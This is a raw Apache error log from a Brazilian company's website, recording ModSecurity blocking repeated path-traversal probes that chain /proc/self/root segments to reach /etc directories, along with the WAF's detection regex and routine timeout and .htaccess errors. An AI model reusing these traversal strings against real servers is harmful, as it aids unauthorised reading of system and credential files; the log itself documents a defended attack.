[Fri Mar 20 03:15:32.840512 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:57232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmBBCii7xarUs8iHYvrgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:37.394402 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:51016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmCfqxLDW4GITHUkSuGQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:37.939643 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:51016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmCfqxLDW4GITHUkSuGwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:43.062699 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:44990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmD_u8EFLIOrSqIpvqegAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:49.431105 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:40056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmFfqxLDW4GITHUkSuKwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:53.129793 2026] [proxy_fcgi:error] [pid 21219:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33314] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:16:03.991194 2026] [:error] [pid 8307:tid 140411741927168] [client 74.7.241.31:41960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmIr-FhjpZGs9ba8qwHwAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:13.947418 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:55932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmLeoXxyEfFpUF8f9PSwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:15.145807 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34134] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:16:18.837845 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:46922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmMr-FhjpZGs9ba8qwKgAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:24.170814 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:44990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmN_u8EFLIOrSqIpvqrgAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:25.908378 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:46938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmOQF0L0L-SsrnPo4zqwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:25.913886 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 57.141.18.119:41276] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:16:30.631494 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:45826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmPvu8EFLIOrSqIpvqtAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:34.899247 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:33430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmQta6ubjKNq_cu4aaJwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:43.243180 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:38996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmS_u8EFLIOrSqIpvqwAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:44.125022 2026] [proxy_fcgi:error] [pid 31215:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35206] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:16:47.439410 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:33878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmT_u8EFLIOrSqIpvqwwAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:16:53.643756 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:33888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmVfXLqtnMIWvjpaJk2gAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:17:01.493833 2026] [core:alert] [pid 21219:tid 140411632822016] [client 57.141.18.82:42712] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:17:02.895819 2026] [proxy_fcgi:error] [pid 30424:tid 140411716749056] [client 103.74.54.128:38688] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 03:17:18.195422 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36298] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:17:21.014424 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.241.31:54110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzmcb-FhjpZGs9ba8qwVQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:17:43.157780 2026] [proxy_fcgi:error] [pid 30424:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37356] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:17:56.416813 2026] [mime_magic:error] [pid 8307:tid 140411616036608] (70014)End of file found: [client 57.141.18.70:44786] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:17:57.044284 2026] [mime_magic:error] [pid 31215:tid 140411716749056] (70014)End of file found: [client 57.141.18.119:44810] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:17:57.044729 2026] [mime_magic:error] [pid 8307:tid 140411725141760] (70014)End of file found: [client 57.141.18.82:44340] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:18:12.117919 2026] [proxy_fcgi:error] [pid 8307:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38524] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:18:41.172121 2026] [mime_magic:error] [pid 11167:tid 140411641214720] (70014)End of file found: [client 57.141.18.101:46456] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:18:42.129813 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39818] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:18:42.724449 2026] [core:alert] [pid 7893:tid 140411540502272] [client 57.141.18.16:46502] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:19:08.149787 2026] [proxy_fcgi:error] [pid 21219:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40936] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:19:33.157810 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41954] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:19:45.405989 2026] [core:alert] [pid 31215:tid 140411548894976] [client 57.141.18.30:48872] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:19:45.406460 2026] [core:alert] [pid 8307:tid 140411716749056] [client 66.249.74.169:53323] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:19:56.137763 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42846] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:20:18.129774 2026] [proxy_fcgi:error] [pid 31215:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43602] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:20:36.761804 2026] [core:alert] [pid 15826:tid 140411540502272] [client 57.141.18.3:51068] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:20:41.129830 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44444] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:20:41.393809 2026] [core:alert] [pid 21219:tid 140411590858496] [client 74.7.243.128:34060] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run
[Fri Mar 20 03:21:04.101876 2026] [proxy_fcgi:error] [pid 8732:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45266] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:21:13.277772 2026] [mime_magic:error] [pid 21219:tid 140411557287680] (70014)End of file found: [client 57.141.18.14:52746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:21:26.133791 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46156] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:21:39.230360 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:39684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznc9a6ubjKNq_cu4aazQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:21:48.157788 2026] [proxy_fcgi:error] [pid 21219:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47062] AH01075: Error dispatching request to : (polling)
